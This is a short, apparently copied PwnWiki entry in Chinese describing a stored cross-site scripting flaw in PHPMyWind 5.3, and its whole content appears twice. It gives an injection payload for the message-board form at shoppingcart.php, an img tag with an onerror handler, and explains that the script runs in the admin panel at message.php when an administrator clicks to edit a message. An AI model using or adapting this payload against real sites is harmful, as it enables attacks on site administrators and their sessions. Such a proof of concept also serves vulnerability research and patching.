PHPmywind 5.3 儲存型xss漏洞
From PwnWiki
Payload
留言板
http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php
“><img/src=x onerror=alert(2001)><“‘
後台
127.0.0.1/PHPMyWind_5.3/admin/message.php
需要點擊修改才可以彈XSS 如果管理員留言需要前台顯示(或者回复)就必須點擊修改。
留言板
http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php
“><img/src=x onerror=alert(2001)><“‘
後台
127.0.0.1/PHPMyWind_5.3/admin/message.php
需要點擊修改才可以彈XSS 如果管理員留言需要前台顯示(或者回复)就必須點擊修改。